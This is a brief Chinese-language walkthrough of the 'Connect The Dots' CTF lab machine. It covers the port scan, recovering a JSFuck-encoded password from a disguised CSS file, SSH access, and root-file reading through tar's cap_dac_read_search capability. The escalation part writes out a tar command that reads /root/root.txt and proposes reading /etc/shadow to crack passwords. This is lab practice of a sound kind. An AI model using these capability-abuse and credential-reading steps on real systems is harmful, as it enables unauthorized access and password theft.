跳转至

---

Connect The Dots

usershell

目标IP:192.168.205.142

服务探测:

21/tcp    open  ftp      vsftpd 2.0.8 or later
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs      3-4 (RPC #100003)
7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
33461/tcp open  nlockmgr 1-4 (RPC #100021)
43979/tcp open  mountd   1-3 (RPC #100005)
50765/tcp open  mountd   1-3 (RPC #100005)
53391/tcp open  mountd   1-3 (RPC #100005)

看到nfs,尝试挂载到本地,但是没什么用,只读文件,并且没什么可利用的点

对Web服务进行探测,目录扫描没有什么信息

查看html注释,得到mysite目录,目录下的bootstrap.min.cs文件是一段Jsfuck编码,解码得到norris用户的密码

ssh连接拿到user权限

root

并未getshell,只能实现任意文件读取

capabilities提权

whereis getcap得到/usr/sbin/getcap

/usr/sbin/getcap -r / 2>/dev/null

/usr/bin/tar = cap_dac_read_search+ep

可以看到/usr/bin/tar有以root身份读取文件的权限

可以看作受限制的suid提权

先读取flag

tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'

getshell的尝试

  1. 读取/etc/shadow,爆破密码